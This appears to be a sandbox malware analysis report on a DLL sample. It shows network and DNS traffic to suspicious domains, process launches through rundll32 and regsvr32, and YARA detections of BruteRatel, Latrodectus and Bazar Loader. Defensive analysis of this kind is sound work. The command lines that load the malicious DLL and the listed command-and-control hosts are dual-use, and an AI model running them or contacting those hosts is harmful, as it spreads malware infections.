May 11, 2024 00:04:15.423537016 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.423574924 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.423590899 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.423614025 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.423616886 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.423635960 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.423640013 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.423652887 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.423682928 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.423687935 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.423732996 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.544538021 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.544625044 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.544735909 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.544791937 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.545012951 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.545084953 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.545223951 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.545291901 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.545304060 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.545350075 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.665793896 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.665921926 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.665981054 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.666047096 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.666162968 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.666223049 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.787254095 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.787345886 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.787383080 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.787396908 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
May 11, 2024 00:04:15.787437916 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.787437916 CEST | 49750 | 443 | 192.168.2.4 | 138.124.183.215
May 11, 2024 00:04:15.787859917 CEST | 443 | 49750 | 138.124.183.215 | 192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.787950039 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.788012028 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.788074017 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.788597107 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.788633108 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.788666964 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.788672924 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.788682938 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.788746119 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.908390045 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.908490896 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.908793926 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.908823967 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.908847094 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.908876896 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.908876896 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:15.908888102 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:15.908951044 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  May 11, 2024 00:04:16.029175997 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:16.029218912 CEST44349750138.124.183.215192.168.2.4
                                                                                                                  May 11, 2024 00:04:16.029264927 CEST49750443192.168.2.4138.124.183.215
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  May 11, 2024 00:04:12.655221939 CEST6103653192.168.2.41.1.1.1
                                                                                                                  May 11, 2024 00:04:12.871501923 CEST53610361.1.1.1192.168.2.4
                                                                                                                  May 11, 2024 00:04:13.858141899 CEST4981053192.168.2.41.1.1.1
                                                                                                                  May 11, 2024 00:04:14.159241915 CEST53498101.1.1.1192.168.2.4
                                                                                                                  May 11, 2024 00:04:18.686336040 CEST5941853192.168.2.41.1.1.1
                                                                                                                  May 11, 2024 00:04:18.799472094 CEST53594181.1.1.1192.168.2.4
                                                                                                                  May 11, 2024 00:04:19.608544111 CEST5506253192.168.2.41.1.1.1
                                                                                                                  May 11, 2024 00:04:19.711488962 CEST53550621.1.1.1192.168.2.4
                                                                                                                  May 11, 2024 00:04:35.505889893 CEST5248453192.168.2.41.1.1.1
                                                                                                                  May 11, 2024 00:04:35.619683981 CEST53524841.1.1.1192.168.2.4
                                                                                                                  May 11, 2024 00:05:43.047148943 CEST6322753192.168.2.41.1.1.1
                                                                                                                  May 11, 2024 00:05:43.138046026 CEST53632271.1.1.1192.168.2.4
                                                                                                                  May 11, 2024 00:06:00.977772951 CEST5786553192.168.2.41.1.1.1
                                                                                                                  May 11, 2024 00:06:01.079061031 CEST53578651.1.1.1192.168.2.4
                                                                                                                  May 11, 2024 00:06:08.749888897 CEST5367753192.168.2.41.1.1.1
                                                                                                                  May 11, 2024 00:06:08.864455938 CEST53536771.1.1.1192.168.2.4
DNS queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 11, 2024 00:04:12.655221939 CEST | 192.168.2.4 | 1.1.1.1 | 0x8441 | Standard query (0) | boriz400.com | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:13.858141899 CEST | 192.168.2.4 | 1.1.1.1 | 0x3148 | Standard query (0) | altynbe.com | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:18.686336040 CEST | 192.168.2.4 | 1.1.1.1 | 0xaee4 | Standard query (0) | ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:19.608544111 CEST | 192.168.2.4 | 1.1.1.1 | 0x69b6 | Standard query (0) | anikvan.com | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:35.505889893 CEST | 192.168.2.4 | 1.1.1.1 | 0x5f9f | Standard query (0) | uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | A (IP address) | IN (0x0001) | false
May 11, 2024 00:05:43.047148943 CEST | 192.168.2.4 | 1.1.1.1 | 0xc6d8 | Standard query (0) | workspacin.cloud | A (IP address) | IN (0x0001) | false
May 11, 2024 00:06:00.977772951 CEST | 192.168.2.4 | 1.1.1.1 | 0xc19b | Standard query (0) | uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | A (IP address) | IN (0x0001) | false
May 11, 2024 00:06:08.749888897 CEST | 192.168.2.4 | 1.1.1.1 | 0x7f64 | Standard query (0) | ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io | A (IP address) | IN (0x0001) | false
DNS answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 11, 2024 00:04:12.871501923 CEST | 1.1.1.1 | 192.168.2.4 | 0x8441 | No error (0) | boriz400.com | - | 91.194.11.183 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:14.159241915 CEST | 1.1.1.1 | 192.168.2.4 | 0x3148 | No error (0) | altynbe.com | - | 138.124.183.215 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:18.799472094 CEST | 1.1.1.1 | 192.168.2.4 | 0xaee4 | No error (0) | ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io | pub-ingress-aws-use1.cloud-ara.tyk.io | - | CNAME (Canonical name) | IN (0x0001) | false
May 11, 2024 00:04:18.799472094 CEST | 1.1.1.1 | 192.168.2.4 | 0xaee4 | No error (0) | pub-ingress-aws-use1.cloud-ara.tyk.io | ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001) | false
May 11, 2024 00:04:18.799472094 CEST | 1.1.1.1 | 192.168.2.4 | 0xaee4 | No error (0) | ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com | - | 54.175.181.104 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:18.799472094 CEST | 1.1.1.1 | 192.168.2.4 | 0xaee4 | No error (0) | ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com | - | 35.172.8.165 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:18.799472094 CEST | 1.1.1.1 | 192.168.2.4 | 0xaee4 | No error (0) | ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com | - | 54.159.36.188 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:19.711488962 CEST | 1.1.1.1 | 192.168.2.4 | 0x69b6 | No error (0) | anikvan.com | - | 95.164.68.73 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:35.619683981 CEST | 1.1.1.1 | 192.168.2.4 | 0x5f9f | No error (0) | uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | pub-ingress-aws-euc1.cloud-ara.tyk.io | - | CNAME (Canonical name) | IN (0x0001) | false
May 11, 2024 00:04:35.619683981 CEST | 1.1.1.1 | 192.168.2.4 | 0x5f9f | No error (0) | pub-ingress-aws-euc1.cloud-ara.tyk.io | ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001) | false
May 11, 2024 00:04:35.619683981 CEST | 1.1.1.1 | 192.168.2.4 | 0x5f9f | No error (0) | ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com | - | 3.69.236.35 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:35.619683981 CEST | 1.1.1.1 | 192.168.2.4 | 0x5f9f | No error (0) | ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com | - | 3.72.42.242 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:04:35.619683981 CEST | 1.1.1.1 | 192.168.2.4 | 0x5f9f | No error (0) | ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com | - | 35.157.36.116 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:05:43.138046026 CEST | 1.1.1.1 | 192.168.2.4 | 0xc6d8 | No error (0) | workspacin.cloud | - | 104.21.16.155 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:05:43.138046026 CEST | 1.1.1.1 | 192.168.2.4 | 0xc6d8 | No error (0) | workspacin.cloud | - | 172.67.213.171 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:06:01.079061031 CEST | 1.1.1.1 | 192.168.2.4 | 0xc19b | No error (0) | uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | pub-ingress-aws-euc1.cloud-ara.tyk.io | - | CNAME (Canonical name) | IN (0x0001) | false
May 11, 2024 00:06:01.079061031 CEST | 1.1.1.1 | 192.168.2.4 | 0xc19b | No error (0) | pub-ingress-aws-euc1.cloud-ara.tyk.io | ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001) | false
May 11, 2024 00:06:01.079061031 CEST | 1.1.1.1 | 192.168.2.4 | 0xc19b | No error (0) | ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com | - | 3.69.236.35 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:06:01.079061031 CEST | 1.1.1.1 | 192.168.2.4 | 0xc19b | No error (0) | ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com | - | 35.157.36.116 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:06:01.079061031 CEST | 1.1.1.1 | 192.168.2.4 | 0xc19b | No error (0) | ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com | - | 3.72.42.242 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:06:08.864455938 CEST | 1.1.1.1 | 192.168.2.4 | 0x7f64 | No error (0) | ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io | pub-ingress-aws-use1.cloud-ara.tyk.io | - | CNAME (Canonical name) | IN (0x0001) | false
May 11, 2024 00:06:08.864455938 CEST | 1.1.1.1 | 192.168.2.4 | 0x7f64 | No error (0) | pub-ingress-aws-use1.cloud-ara.tyk.io | ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001) | false
May 11, 2024 00:06:08.864455938 CEST | 1.1.1.1 | 192.168.2.4 | 0x7f64 | No error (0) | ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com | - | 54.175.181.104 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:06:08.864455938 CEST | 1.1.1.1 | 192.168.2.4 | 0x7f64 | No error (0) | ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com | - | 54.159.36.188 | A (IP address) | IN (0x0001) | false
May 11, 2024 00:06:08.864455938 CEST | 1.1.1.1 | 192.168.2.4 | 0x7f64 | No error (0) | ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com | - | 35.172.8.165 | A (IP address) | IN (0x0001) | false
Contacted domains

• boriz400.com
• altynbe.com
• ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io
• anikvan.com
• uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
• workspacin.cloud


Target ID: 0
Start time: 00:03:58
Start date: 11/05/2024
Path: C:\Windows\System32\loaddll64.exe
Wow64 process (32bit): false
Commandline: loaddll64.exe "C:\Users\user\Desktop\upfilles.dll.dll"
Imagebase: 0x7ff61d400000
File size: 165'888 bytes
MD5 hash: 763455F9DCB24DFEECC2B9D9F8D46D52
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 1
Start time: 00:03:59
Start date: 11/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 00:03:59
Start date: 11/05/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Imagebase: 0x7ff70e6c0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 00:03:59
Start date: 11/05/2024
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll
Imagebase: 0x7ff64ee30000
File size: 25'088 bytes
MD5 hash: B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 00:03:59
Start date: 11/05/2024
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Imagebase: 0x7ff74e4b0000
File size: 71'680 bytes
MD5 hash: EF3179D498793BF4234F708D3BE28633
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 00:03:59
Start date: 11/05/2024
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow
Imagebase: 0x7ff74e4b0000
File size: 71'680 bytes
MD5 hash: EF3179D498793BF4234F708D3BE28633
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 00:04:02
Start date: 11/05/2024
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject
Imagebase: 0x7ff74e4b0000
File size: 71'680 bytes
MD5 hash: EF3179D498793BF4234F708D3BE28633
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                  Target ID:9
                                                                                                                  Start time:00:04:02
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 6324 -s 344
                                                                                                                  Imagebase:0x7ff67a3b0000
                                                                                                                  File size:570'736 bytes
                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:10
                                                                                                                  Start time:00:04:05
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall
                                                                                                                  Imagebase:0x7ff74e4b0000
                                                                                                                  File size:71'680 bytes
                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:12
                                                                                                                  Start time:00:04:05
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 6516 -s 344
                                                                                                                  Imagebase:0x7ff67a3b0000
                                                                                                                  File size:570'736 bytes
                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:13
                                                                                                                  Start time:00:04:08
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow
                                                                                                                  Imagebase:0x7ff74e4b0000
                                                                                                                  File size:71'680 bytes
                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:14
                                                                                                                  Start time:00:04:08
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject
                                                                                                                  Imagebase:0x7ff74e4b0000
                                                                                                                  File size:71'680 bytes
                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:15
                                                                                                                  Start time:00:04:08
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall
                                                                                                                  Imagebase:0x7ff74e4b0000
                                                                                                                  File size:71'680 bytes
                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:16
                                                                                                                  Start time:00:04:08
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer
                                                                                                                  Imagebase:0x7ff74e4b0000
                                                                                                                  File size:71'680 bytes
                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:18
                                                                                                                  Start time:00:04:08
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow
                                                                                                                  Imagebase:0x7ff74e4b0000
                                                                                                                  File size:71'680 bytes
                                                                                                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1867725723.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1868887059.00000292135D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1868680221.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1843192476.0000029213423000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1867965215.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1867247710.00007DF4F0220000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2738816096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000012.00000002.2938671459.0000029211650000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Bazar_2, Description: Yara detected Bazar Loader, Source: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1842909028.0000029213422000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2311847302.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2284190577.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1868287262.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1868470583.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Has exited:false

                                                                                                                  Target ID:20
                                                                                                                  Start time:00:04:08
                                                                                                                  Start date:11/05/2024
                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 7272 -s 344
